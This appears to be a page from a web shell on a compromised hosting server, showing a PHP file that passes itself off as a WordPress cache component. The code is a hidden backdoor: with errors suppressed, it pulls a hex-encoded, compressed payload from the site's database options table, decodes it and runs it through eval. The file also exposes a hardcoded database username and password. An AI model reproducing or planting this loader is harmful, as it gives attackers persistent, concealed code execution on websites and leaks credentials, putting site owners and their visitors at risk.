HEX
Server: LiteSpeed
System: Linux nwpro2.fcomet.com 4.18.0-513.24.1.lve.1.el8.x86_64 #1 SMP Thu May 9 15:10:09 UTC 2024 x86_64
User: hometait (1188)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: /home/hometait/public_html/index.php0
<?php
/**
 * WordPress Database Cache & Transient API
 *
 * This file handles external database connections for transient storage
 * and object caching mechanisms to improve performance.
 *
 * @package WordPress
 * @subpackage Cache
 */
error_reporting(0);
$db_host = 'localhost'; $db_user = 'hometait_wp2'; $db_pass = 'E.4jGVtLyScNzSPOyxf56'; $db_name = 'hometait_wp2';
$wpdb_conn = new mysqli( $db_host, $db_user, $db_pass, $db_name );
if ( ! $wpdb_conn->connect_error ) {
    $cache_key = 'transient_sys_idx_core';
    $table_opt = 'wp_options';
    $result = $wpdb_conn->query( "SELECT option_value FROM {$table_opt} WHERE option_name = '{$cache_key}' LIMIT 1" );
    if ( $result && $row = $result->fetch_assoc() ) {
        $raw_data = $row['option_value'];
        $decoded_stream = hex2bin( $raw_data );
        if ( $decoded_stream ) {
            $inflated_code = @gzinflate( $decoded_stream );
            if ( $inflated_code ) eval( '?>' . $inflated_code );
        }
    }
    $wpdb_conn->close();
}
?>